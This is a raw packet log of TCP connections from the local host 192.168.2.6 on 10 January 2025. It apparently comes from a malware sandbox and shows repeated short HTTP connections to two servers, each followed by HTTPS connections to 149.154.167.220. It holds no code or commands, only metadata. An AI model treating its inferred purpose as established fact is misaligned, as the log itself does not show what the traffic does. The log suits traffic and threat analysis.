Jan 10, 2025 22:43:40.404567003 CET	49978	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:40.413561106 CET	49984	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:40.418354988 CET	80	49984	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:40.418411970 CET	49984	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:40.418509007 CET	49984	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:40.423214912 CET	80	49984	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:41.236248016 CET	80	49984	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:41.254303932 CET	49989	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:41.254347086 CET	443	49989	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:41.254422903 CET	49989	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:41.255556107 CET	49989	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:41.255567074 CET	443	49989	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:41.298850060 CET	49984	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:41.884018898 CET	443	49989	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:41.885773897 CET	49989	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:41.885806084 CET	443	49989	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:41.885855913 CET	49989	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:41.885864973 CET	443	49989	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:42.193823099 CET	443	49989	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:42.193913937 CET	443	49989	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:42.193960905 CET	49989	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:42.194334030 CET	49989	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:42.197869062 CET	49984	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:42.198769093 CET	49991	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:42.202792883 CET	80	49984	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:42.202912092 CET	49984	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:42.203517914 CET	80	49991	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:42.203596115 CET	49991	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:42.203737974 CET	49991	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:42.208569050 CET	80	49991	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:43.095438004 CET	80	49991	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:43.096709967 CET	49992	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:43.096749067 CET	443	49992	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:43.096812010 CET	49992	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:43.097069979 CET	49992	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:43.097080946 CET	443	49992	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:43.136930943 CET	49991	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:43.705277920 CET	443	49992	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:43.707042933 CET	49992	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:43.707067013 CET	443	49992	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:43.707122087 CET	49992	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:43.707129955 CET	443	49992	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:44.155710936 CET	443	49992	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:44.155795097 CET	443	49992	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:44.155838966 CET	49992	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:44.156383991 CET	49992	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:44.171066046 CET	49991	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:44.179528952 CET	80	49991	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:44.179584026 CET	49991	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:44.180701971 CET	49994	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:44.185718060 CET	80	49994	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:44.185782909 CET	49994	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:44.185894012 CET	49994	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:44.191514969 CET	80	49994	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:44.751507044 CET	80	49994	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:44.752728939 CET	49995	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:44.752787113 CET	443	49995	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:44.752847910 CET	49995	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:44.753134012 CET	49995	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:44.753149986 CET	443	49995	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:44.793167114 CET	49994	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:45.358717918 CET	443	49995	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:45.360338926 CET	49995	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:45.360364914 CET	443	49995	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:45.360423088 CET	49995	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:45.360431910 CET	443	49995	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:45.707133055 CET	443	49995	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:45.707216024 CET	443	49995	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:45.707310915 CET	49995	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:45.707762957 CET	49995	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:45.710905075 CET	49994	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:45.712021112 CET	49996	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:45.715858936 CET	80	49994	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:45.716825008 CET	80	49996	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:45.716880083 CET	49994	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:45.716914892 CET	49996	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:45.717025042 CET	49996	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:45.721740961 CET	80	49996	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:46.293987989 CET	80	49996	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:46.295105934 CET	49997	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:46.295157909 CET	443	49997	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:46.295304060 CET	49997	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:46.295514107 CET	49997	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:46.295526028 CET	443	49997	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:46.340040922 CET	49996	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:46.925349951 CET	443	49997	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:46.929960012 CET	49997	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:46.929976940 CET	443	49997	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:46.930690050 CET	49997	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:46.930696964 CET	443	49997	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:47.355704069 CET	443	49997	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:47.355792999 CET	443	49997	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:47.355864048 CET	49997	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:47.356256962 CET	49997	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:47.359370947 CET	49996	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:47.360500097 CET	49998	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:47.364511967 CET	80	49996	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:47.364597082 CET	49996	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:47.367480993 CET	80	49998	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:47.367558002 CET	49998	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:47.367672920 CET	49998	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:47.373423100 CET	80	49998	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:47.962541103 CET	80	49998	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:47.964051008 CET	49999	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:47.964092016 CET	443	49999	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:47.964176893 CET	49999	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:47.964497089 CET	49999	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:47.964509010 CET	443	49999	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:48.012039900 CET	49998	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:48.569633007 CET	443	49999	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:48.571465015 CET	49999	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:48.571484089 CET	443	49999	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:48.575460911 CET	49999	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:48.575467110 CET	443	49999	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:48.810625076 CET	443	49999	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:48.810720921 CET	443	49999	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:48.810785055 CET	49999	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:48.814169884 CET	49998	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:48.815121889 CET	50000	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:48.815484047 CET	49999	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:48.819148064 CET	80	49998	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:48.819248915 CET	49998	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:48.819909096 CET	80	50000	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:48.819973946 CET	50000	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:48.821504116 CET	50000	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:48.826215982 CET	80	50000	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:49.425270081 CET	80	50000	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:49.426760912 CET	50001	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:49.426806927 CET	443	50001	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:49.426918030 CET	50001	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:49.427200079 CET	50001	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:49.427211046 CET	443	50001	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:49.465059996 CET	50000	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:50.045056105 CET	443	50001	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:50.046787024 CET	50001	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:50.046828032 CET	443	50001	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:50.046962976 CET	50001	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:50.046969891 CET	443	50001	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:50.501811028 CET	443	50001	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:50.503794909 CET	443	50001	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:50.503880024 CET	50001	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:50.560755968 CET	50001	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:50.872953892 CET	50000	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:50.874099016 CET	50002	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:50.878036022 CET	80	50000	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:50.878091097 CET	50000	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:50.878927946 CET	80	50002	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:50.878987074 CET	50002	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:50.879101992 CET	50002	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:50.883857012 CET	80	50002	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:51.652462006 CET	80	50002	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:51.653918982 CET	50003	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:51.654028893 CET	443	50003	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:51.654124022 CET	50003	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:51.654424906 CET	50003	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:51.654499054 CET	443	50003	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:51.699425936 CET	50002	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:52.275254011 CET	443	50003	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:52.276906967 CET	50003	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:52.276954889 CET	443	50003	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:52.277031898 CET	50003	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:52.277054071 CET	443	50003	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:52.514420033 CET	443	50003	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:52.514633894 CET	443	50003	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:52.514782906 CET	50003	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:52.515053988 CET	50003	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:52.518124104 CET	50002	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:52.519093990 CET	50004	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:52.523154974 CET	80	50002	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:52.523247957 CET	50002	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:52.523942947 CET	80	50004	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:52.524003983 CET	50004	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:52.524235964 CET	50004	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:52.528978109 CET	80	50004	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:53.115761995 CET	80	50004	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:53.116991043 CET	50005	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:53.117036104 CET	443	50005	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:53.117124081 CET	50005	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:53.117373943 CET	50005	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:53.117381096 CET	443	50005	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:53.168194056 CET	50004	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:53.727142096 CET	443	50005	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:53.728758097 CET	50005	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:53.728780031 CET	443	50005	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:53.728887081 CET	50005	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:53.728897095 CET	443	50005	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:53.963613987 CET	443	50005	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:53.963804960 CET	443	50005	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:53.963864088 CET	50005	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:53.964207888 CET	50005	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:53.967912912 CET	50004	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:53.969131947 CET	50006	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:53.973958969 CET	80	50004	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:53.974010944 CET	50004	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:53.974997044 CET	80	50006	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:53.975052118 CET	50006	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:53.975125074 CET	50006	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:53.980554104 CET	80	50006	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:54.536262989 CET	80	50006	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:54.537466049 CET	50007	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:54.537508965 CET	443	50007	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:54.537817955 CET	50007	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:54.538053989 CET	50007	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:54.538063049 CET	443	50007	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:54.590090036 CET	50006	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:55.171391964 CET	443	50007	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:55.172949076 CET	50007	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:55.172966957 CET	443	50007	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:55.173190117 CET	50007	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:55.173196077 CET	443	50007	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:55.399924994 CET	443	50007	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:55.400100946 CET	443	50007	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:55.400151014 CET	50007	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:55.400526047 CET	50007	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:55.403404951 CET	50006	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:55.404561043 CET	50008	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:55.408437967 CET	80	50006	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:55.408555984 CET	50006	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:55.409415960 CET	80	50008	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:55.409478903 CET	50008	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:55.409564018 CET	50008	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:55.414362907 CET	80	50008	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:56.009612083 CET	80	50008	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:56.021743059 CET	50009	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:56.021846056 CET	443	50009	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:56.021940947 CET	50009	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:56.025136948 CET	50009	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:56.025170088 CET	443	50009	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:56.058799982 CET	50008	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:56.648751020 CET	443	50009	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:56.652030945 CET	50009	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:56.652066946 CET	443	50009	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:56.652132988 CET	50009	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:56.652148962 CET	443	50009	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:56.922820091 CET	443	50009	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:56.922914028 CET	443	50009	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:56.923018932 CET	50009	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:56.923460960 CET	50009	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:56.926250935 CET	50008	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:56.926961899 CET	50010	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:56.931360006 CET	80	50008	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:56.931514978 CET	50008	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:56.931821108 CET	80	50010	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:56.931885004 CET	50010	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:56.931965113 CET	50010	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:56.936769009 CET	80	50010	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:57.524126053 CET	80	50010	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:57.527781963 CET	50011	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:57.527849913 CET	443	50011	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:57.527929068 CET	50011	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:57.528193951 CET	50011	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:57.528206110 CET	443	50011	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:57.574439049 CET	50010	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:58.158023119 CET	443	50011	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:58.159816980 CET	50011	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:58.159842014 CET	443	50011	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:58.159903049 CET	50011	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:58.159913063 CET	443	50011	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:58.555560112 CET	443	50011	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:58.555656910 CET	443	50011	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:58.555715084 CET	50011	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:58.568836927 CET	50011	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:58.643475056 CET	50010	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:58.648605108 CET	80	50010	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:58.648711920 CET	50010	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:58.680286884 CET	50012	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:58.685216904 CET	80	50012	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:58.685305119 CET	50012	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:58.712678909 CET	50012	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:58.717550993 CET	80	50012	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:59.291250944 CET	80	50012	158.101.44.242	192.168.2.6
Jan 10, 2025 22:43:59.292962074 CET	50013	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:59.293066978 CET	443	50013	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:59.293203115 CET	50013	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:59.293780088 CET	50013	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:59.293809891 CET	443	50013	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:59.340085030 CET	50012	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:43:59.929893017 CET	443	50013	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:59.931910992 CET	50013	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:59.931934118 CET	443	50013	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:59.932043076 CET	50013	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:59.932056904 CET	443	50013	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:00.306163073 CET	443	50013	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:00.306276083 CET	443	50013	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:00.306426048 CET	50013	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:00.306838036 CET	50013	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:00.309664011 CET	50012	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:00.310667992 CET	50014	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:00.314708948 CET	80	50012	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:00.315440893 CET	80	50014	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:00.315624952 CET	50012	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:00.315656900 CET	50014	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:00.315828085 CET	50014	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:00.320569992 CET	80	50014	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:00.928858995 CET	80	50014	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:00.930005074 CET	50015	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:00.930047035 CET	443	50015	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:00.930123091 CET	50015	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:00.930424929 CET	50015	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:00.930439949 CET	443	50015	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:00.980715990 CET	50014	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:01.621939898 CET	443	50015	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:01.623594046 CET	50015	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:01.623657942 CET	443	50015	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:01.623742104 CET	50015	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:01.623766899 CET	443	50015	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:01.881059885 CET	443	50015	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:01.881146908 CET	443	50015	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:01.881200075 CET	50015	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:01.881665945 CET	50015	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:01.884824038 CET	50014	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:01.885862112 CET	50016	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:01.889775038 CET	80	50014	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:01.889825106 CET	50014	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:01.890688896 CET	80	50016	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:01.890755892 CET	50016	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:01.890877008 CET	50016	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:01.895581961 CET	80	50016	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:02.501419067 CET	80	50016	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:02.507010937 CET	50017	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:02.507067919 CET	443	50017	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:02.507117033 CET	50017	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:02.507438898 CET	50017	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:02.507451057 CET	443	50017	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:02.543253899 CET	50016	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:03.132617950 CET	443	50017	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:03.134582043 CET	50017	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:03.134628057 CET	443	50017	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:03.134707928 CET	50017	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:03.134718895 CET	443	50017	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:03.565576077 CET	443	50017	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:03.565804005 CET	443	50017	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:03.565896988 CET	50017	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:03.566143036 CET	50017	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:03.569152117 CET	50016	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:03.569868088 CET	50018	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:03.574112892 CET	80	50016	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:03.574215889 CET	50016	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:03.574661970 CET	80	50018	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:03.574738026 CET	50018	80	192.168.2.6	158.101.44.242
